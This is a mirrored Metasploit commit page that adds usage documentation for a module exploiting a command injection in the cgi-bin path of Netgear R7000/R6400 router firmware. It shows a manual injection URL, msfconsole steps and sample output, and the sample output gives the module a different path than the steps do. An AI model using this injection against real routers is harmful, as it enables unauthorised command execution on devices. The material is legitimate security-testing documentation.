infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Start docs

bug/bundler_fix
Carter 2017-02-16 08:44:36 -05:00 committed by GitHub
parent 811f6d4d58
commit d775c66adf
1 changed files with 57 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md Normal file
View File

@ -0,0 +1,57 @@
The netgear_r7000_command_injection module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
## Vulnerable Application
Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and possibly earlier.
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/netgear_r7000_cgibin_exec`
3. Do: `set RHOST <RouterIP>`
4. Do: `set PAYLOAD <payload>
5. Do: `run`
6. If the router is a R7000 or R6400, the module should run
## Options
**RHOST**
This should usually be the local IP address of the vulnerable router.
**PAYLOAD**
The valid payloads are `unix cmd` payloads _only_, as this is a command execution module
## Scenarios
Sample output of what it should look like.
```
msf > use auxiliary/scanner/http/netgear_r7000_command_injection
msf auxiliary(netgear_r7000_command_injection) > options
Module options (auxiliary/scanner/http/netgear_r7000_command_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes Command line to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The remote target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf auxiliary(netgear_r7000_command_injection) > set CMD echo "cowsay"
CMD => echo 'cowsay'
msf auxiliary(netgear_r7000_command_injection) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(netgear_r7000_command_injection) > check
[*] 192.168.1.1:80 The target service is running, but could not be validated.
msf auxiliary(netgear_r7000_command_injection) > run
[*] Sending request to 192.168.1.1
[*] Auxiliary module execution completed
msf auxiliary(netgear_r7000_command_injection) >
```